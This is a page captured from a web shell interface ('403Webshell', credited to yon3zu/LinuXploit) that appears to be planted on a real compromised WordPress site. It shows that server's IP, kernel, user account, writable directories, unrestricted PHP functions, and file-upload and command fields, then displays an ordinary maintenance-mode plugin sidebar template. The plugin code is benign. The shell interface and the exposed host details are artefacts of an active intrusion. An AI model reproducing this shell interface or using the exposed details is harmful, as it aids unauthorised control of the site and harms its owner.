403Webshell
Server IP : 85.158.181.41  /  Your IP : 216.73.217.12
Web Server : Apache
System : Linux cloud9-vm129 6.1.178+1-ph #ph SMP PREEMPT_DYNAMIC Wed Jul 29 09:00:54 UTC 2026 x86_64
User : moncbefd ( 1024)
PHP Version : 7.3.33
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /home/moncbefd/www.moneta.at/blog/wp-content/plugins/wp-maintenance-mode/views/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /home/moncbefd/www.moneta.at/blog/wp-content/plugins/wp-maintenance-mode/views/sidebar.php
<div id="sidebar" class="wrapper-cell">
    <div class="sidebar_box info_box">
        <h3><?php _e('Plugin Info', $this->plugin_slug); ?></h3>
        <div class="inside">
			<?php $plugin_data = wpmm_plugin_info($this->plugin_slug); ?>
            <ul>
                <li><?php _e('Name', $this->plugin_slug); ?>: 
					<?php
					echo!empty($plugin_data['Name']) ? $plugin_data['Name'] : '';
					echo!empty($plugin_data['Version']) ? ' v' . $plugin_data['Version'] : '';
					?>
                </li>
                <li><?php _e('Author', $this->plugin_slug); ?>: <?php echo!empty($plugin_data['AuthorName']) ? $plugin_data['AuthorName'] : ''; ?></li>
                <li><?php _e('Website', $this->plugin_slug); ?>: <?php echo!empty($plugin_data['AuthorURI']) ? '<a href="' . $plugin_data['AuthorURI'] . WPMM_AUTHOR_UTM . '" target="_blank">' . $plugin_data['AuthorName'] . '</a>' : ''; ?></li>
                <li><?php _e('Twitter', $this->plugin_slug); ?>: <?php echo!empty($plugin_data['Twitter']) ? '<a href="http://twitter.com/' . $plugin_data['Twitter'] . '" target="_blank">@' . $plugin_data['Twitter'] . '</a>' : ''; ?></li>
                <li><?php _e('GitHub', $this->plugin_slug); ?>: <?php echo!empty($plugin_data['GitHub Plugin URI']) ? '<a href="' . $plugin_data['GitHub Plugin URI'] . '" target="_blank">' . basename($plugin_data['GitHub Plugin URI']) . '</a>' : ''; ?></li>
            </ul>
        </div>
    </div>

	<?php
	$banners = wpmm_get_banners();

	if (!empty($banners['product'])) {
		?>
		<div class="sidebar_box themes_box">
			<h3><?php _e('Other products', $this->plugin_slug); ?></h3>
			<div class="inside">
				<ul>
					<?php
					foreach ($banners['product'] as $item) {
						if ($item['utm']) {
							$item['link'] = $item['link'] . WPMM_AUTHOR_UTM;
						}

						printf('<li><a href="%s" target="_blank" title="%s"><img src="%s" alt="%s" width="280" height="160" /></a></li>', $item['link'], $item['title'], $item['image'], $item['title']);
					}
					?>
				</ul>
			</div>
		</div>     
	<?php } ?>

	<?php
	if (!empty($banners['resource'])) {
		?>
		<div class="sidebar_box resources_box">
			<h3><?php _e('Resources', $this->plugin_slug); ?></h3>
			<div class="inside">
				<ul>
					<?php
					foreach ($banners['resource'] as $item) {
						if ($item['utm']) {
							$item['link'] = $item['link'] . WPMM_AUTHOR_UTM;
						}
						
						printf('<li><a href="%s" target="_blank" title="%s"><img src="%s" alt="%s" width="280" height="160" /></a></li>', $item['link'], $item['title'], $item['image'], $item['title']);
					}
					?>
				</ul>
			</div>
		</div>
	<?php } ?>
</div>

Youez - 2016 - github.com/yon3zu
LinuXploit